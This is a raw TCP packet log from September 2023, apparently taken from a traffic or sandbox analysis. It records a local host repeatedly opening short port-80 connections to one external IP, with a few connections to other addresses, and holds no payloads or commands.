Sep 28, 2023 06:03:54.476500988 CEST	50155	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.670053005 CEST	80	50157	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:54.674062967 CEST	80	50157	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:54.674484968 CEST	50157	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.779273033 CEST	50157	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.780363083 CEST	50158	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.974004984 CEST	80	50157	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:54.974430084 CEST	50157	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.979526997 CEST	80	50158	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:54.979865074 CEST	50158	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:54.979945898 CEST	50158	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.179306984 CEST	80	50158	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:55.184381008 CEST	80	50158	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:55.184660912 CEST	50158	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.295092106 CEST	50158	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.295782089 CEST	50159	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.483470917 CEST	80	50159	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:55.483725071 CEST	50159	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.484029055 CEST	50159	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.494249105 CEST	80	50158	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:55.494507074 CEST	50158	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.636893034 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:03:55.670739889 CEST	80	50159	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:55.671941996 CEST	80	50159	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:55.672002077 CEST	50159	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.784621954 CEST	50159	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.785099983 CEST	50161	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.972634077 CEST	80	50159	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:55.972966909 CEST	50159	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.981482029 CEST	80	50161	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:55.981695890 CEST	50161	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:55.981837034 CEST	50161	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:56.178385973 CEST	80	50161	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:56.185595036 CEST	80	50161	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:56.185882092 CEST	50161	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:56.294923067 CEST	50161	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:56.295299053 CEST	50162	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:56.489820957 CEST	80	50162	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:56.490114927 CEST	50162	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:56.492130995 CEST	80	50161	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:56.492336035 CEST	50161	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:56.502615929 CEST	50162	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:56.696482897 CEST	80	50162	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:56.702812910 CEST	80	50162	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:56.703111887 CEST	50162	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:56.815087080 CEST	50162	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:56.815452099 CEST	50163	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.005521059 CEST	80	50163	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:57.005693913 CEST	50163	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.005888939 CEST	50163	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.008759022 CEST	80	50162	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:57.008949995 CEST	50162	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.196166039 CEST	80	50163	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:57.201234102 CEST	80	50163	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:57.201399088 CEST	50163	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.310183048 CEST	50163	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.310492039 CEST	50165	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.500319004 CEST	80	50163	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:57.500407934 CEST	50163	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.509912968 CEST	80	50165	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:57.509990931 CEST	50165	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.510277987 CEST	50165	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.709726095 CEST	80	50165	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:57.714339018 CEST	80	50165	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:57.714679003 CEST	50165	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.826575994 CEST	50165	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:57.827088118 CEST	50166	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:58.021017075 CEST	80	50166	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:58.021099091 CEST	50166	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:58.021306038 CEST	50166	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:58.026377916 CEST	80	50165	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:58.026462078 CEST	50165	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:58.215123892 CEST	80	50166	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:58.219438076 CEST	80	50166	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:58.219587088 CEST	50166	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:58.326394081 CEST	50166	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:58.326858044 CEST	50167	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:58.520476103 CEST	80	50166	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:58.520690918 CEST	50166	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:58.525751114 CEST	80	50167	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:58.525980949 CEST	50167	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:58.536619902 CEST	50167	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:58.736226082 CEST	80	50167	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:58.740362883 CEST	80	50167	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:58.740570068 CEST	50167	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:59.029366970 CEST	50167	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:59.030029058 CEST	50169	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:59.226327896 CEST	80	50169	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:59.226656914 CEST	50169	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:59.228936911 CEST	80	50167	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:59.229336023 CEST	50167	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:59.477060080 CEST	50169	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:59.673851013 CEST	80	50169	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:59.675337076 CEST	80	50169	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:59.675424099 CEST	50169	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:59.779218912 CEST	50169	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:59.779686928 CEST	50170	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:59.902510881 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:03:59.975775957 CEST	80	50170	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:59.975837946 CEST	80	50169	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:59.976003885 CEST	50169	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:59.976396084 CEST	50170	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:59.976396084 CEST	50170	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.172404051 CEST	80	50170	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:00.173718929 CEST	80	50170	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:00.173811913 CEST	50170	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.279139042 CEST	50170	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.279525995 CEST	50171	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.466772079 CEST	80	50171	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:00.466973066 CEST	50171	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.467086077 CEST	50171	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.475121021 CEST	80	50170	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:00.475254059 CEST	50170	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.560715914 CEST	50171	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.654783010 CEST	80	50171	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:00.655107975 CEST	50171	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.659027100 CEST	80	50171	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:00.659210920 CEST	50171	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.670854092 CEST	50173	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.868324995 CEST	80	50173	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:00.868582010 CEST	50173	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:00.868675947 CEST	50173	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.066282034 CEST	80	50173	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:01.067363977 CEST	80	50173	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:01.067536116 CEST	50173	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.170166969 CEST	50173	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.170588017 CEST	50175	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.367875099 CEST	80	50175	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:01.367938042 CEST	80	50173	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:01.368207932 CEST	50173	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.368454933 CEST	50175	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.368454933 CEST	50175	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.565655947 CEST	80	50175	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:01.566904068 CEST	80	50175	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:01.567002058 CEST	50175	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.671412945 CEST	50175	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.672292948 CEST	50176	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.866292953 CEST	80	50176	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:01.866483927 CEST	50176	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.866714001 CEST	50176	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:01.868649960 CEST	80	50175	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:01.868870020 CEST	50175	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.060708046 CEST	80	50176	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:02.064965963 CEST	80	50176	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:02.065043926 CEST	50176	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.170100927 CEST	50176	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.170547009 CEST	50177	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.359092951 CEST	80	50177	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:02.359175920 CEST	50177	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.359369993 CEST	50177	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.363878965 CEST	80	50176	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:02.364068031 CEST	50176	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.547713995 CEST	80	50177	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:02.549529076 CEST	80	50177	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:02.549699068 CEST	50177	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.654572964 CEST	50177	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.654983997 CEST	50178	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.844137907 CEST	80	50177	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:02.844338894 CEST	50177	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.852626085 CEST	80	50178	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:02.852731943 CEST	50178	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:02.852933884 CEST	50178	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.050304890 CEST	80	50178	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:03.054897070 CEST	80	50178	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:03.055283070 CEST	50178	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.170402050 CEST	50178	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.170929909 CEST	50179	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.362420082 CEST	80	50179	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:03.362654924 CEST	50179	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.362761974 CEST	50179	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.369065046 CEST	80	50178	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:03.369143009 CEST	50178	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.554152966 CEST	80	50179	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:03.556583881 CEST	80	50179	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:03.556653023 CEST	50179	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.673136950 CEST	50179	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.673360109 CEST	50181	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.864548922 CEST	80	50179	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:03.864763021 CEST	50179	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.871087074 CEST	80	50181	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:03.871320009 CEST	50181	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:03.871680975 CEST	50181	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.069953918 CEST	80	50181	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:04.071501970 CEST	80	50181	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:04.071578979 CEST	50181	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.185381889 CEST	50181	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.185868979 CEST	50182	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.375555038 CEST	80	50182	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:04.375777960 CEST	50182	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.375866890 CEST	50182	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.383374929 CEST	80	50181	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:04.383574963 CEST	50181	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.565928936 CEST	80	50182	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:04.570189953 CEST	80	50182	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:04.570305109 CEST	50182	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.685523033 CEST	50182	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.685945988 CEST	50183	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.875679016 CEST	80	50182	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:04.876080990 CEST	50182	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.882846117 CEST	80	50183	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:04.882920027 CEST	50183	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:04.883121014 CEST	50183	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.080085993 CEST	80	50183	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:05.082016945 CEST	80	50183	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:05.082078934 CEST	50183	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.185321093 CEST	50183	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.185549974 CEST	50185	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.370138884 CEST	80	50185	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:05.370220900 CEST	50185	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.370465040 CEST	50185	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.382092953 CEST	80	50183	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:05.382153988 CEST	50183	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.554837942 CEST	80	50185	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:05.560642958 CEST	80	50185	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:05.560827971 CEST	50185	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.669725895 CEST	50185	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.670099020 CEST	50186	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.840183020 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:04:05.854346037 CEST	80	50185	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:05.854634047 CEST	50185	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.857013941 CEST	80	50186	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:05.857105970 CEST	50186	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:05.857310057 CEST	50186	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.044464111 CEST	80	50186	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:06.049202919 CEST	80	50186	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:06.049549103 CEST	50186	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.154361010 CEST	50186	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.154833078 CEST	50187	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.341701031 CEST	80	50186	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:06.341799021 CEST	50186	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.359707117 CEST	80	50187	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:06.359822035 CEST	50187	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.360048056 CEST	50187	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.564450979 CEST	80	50187	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:06.566963911 CEST	80	50187	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:06.567239046 CEST	50187	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.669852972 CEST	50187	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.670233965 CEST	50189	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.862185955 CEST	80	50189	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:06.862464905 CEST	50189	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.862617016 CEST	50189	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:06.875132084 CEST	80	50187	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:06.875232935 CEST	50187	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.054182053 CEST	80	50189	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:07.061086893 CEST	80	50189	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:07.061247110 CEST	50189	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.170161963 CEST	50189	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.170613050 CEST	50190	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.361974001 CEST	80	50189	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:07.362148046 CEST	50189	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.370421886 CEST	80	50190	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:07.370532036 CEST	50190	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.370757103 CEST	50190	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.570642948 CEST	80	50190	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:07.574594021 CEST	80	50190	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:07.574927092 CEST	50190	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.686028957 CEST	50190	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.686378956 CEST	50191	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.886331081 CEST	80	50190	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:07.886652946 CEST	50190	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.886842012 CEST	80	50191	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:07.887155056 CEST	50191	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:07.887155056 CEST	50191	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.088615894 CEST	80	50191	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:08.092694044 CEST	80	50191	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:08.092864037 CEST	50191	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.201101065 CEST	50191	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.201314926 CEST	50193	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.395462036 CEST	80	50193	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:08.395698071 CEST	50193	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.395768881 CEST	50193	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.401747942 CEST	80	50191	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:08.402018070 CEST	50191	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.589993954 CEST	80	50193	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:08.595077991 CEST	80	50193	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:08.595144987 CEST	50193	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.700851917 CEST	50193	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.701188087 CEST	50194	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.894983053 CEST	80	50194	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:08.895047903 CEST	80	50193	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:08.895082951 CEST	50194	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.895106077 CEST	50193	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:08.895266056 CEST	50194	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.090073109 CEST	80	50194	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:09.094784975 CEST	80	50194	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:09.095043898 CEST	50194	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.205604076 CEST	50194	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.206207991 CEST	50195	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.397408009 CEST	80	50195	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:09.397715092 CEST	50195	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.397916079 CEST	50195	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.399277925 CEST	80	50194	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:09.399481058 CEST	50194	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.589179993 CEST	80	50195	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:09.593874931 CEST	80	50195	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:09.594034910 CEST	50195	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.701083899 CEST	50195	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.723695993 CEST	50196	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.892390013 CEST	80	50195	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:09.892570972 CEST	50195	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.910764933 CEST	80	50196	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:09.910932064 CEST	50196	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:09.912652016 CEST	50196	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.099581957 CEST	80	50196	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:10.104485989 CEST	80	50196	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:10.104559898 CEST	50196	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.216829062 CEST	50196	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.217505932 CEST	50198	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.404158115 CEST	80	50196	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:10.404448032 CEST	50196	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.417849064 CEST	80	50198	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:10.418159008 CEST	50198	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.418736935 CEST	50198	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.619066954 CEST	80	50198	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:10.623270988 CEST	80	50198	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:10.623439074 CEST	50198	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.732398033 CEST	50198	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.734813929 CEST	50199	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.925585032 CEST	80	50199	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:10.925775051 CEST	50199	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.926029921 CEST	50199	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:10.932619095 CEST	80	50198	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:10.932769060 CEST	50198	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:11.116749048 CEST	80	50199	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:11.125277996 CEST	80	50199	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:11.125371933 CEST	50199	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:11.233217001 CEST	50199	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:11.233658075 CEST	50200	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:11.424685001 CEST	80	50200	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:11.424861908 CEST	50200	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:11.425164938 CEST	50200	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:04:11.429327965 CEST	80	50199	95.141.41.12	192.168.2.3
Sep 28, 2023 06:04:11.429580927 CEST	50199	80	192.168.2.3	95.141.41.12
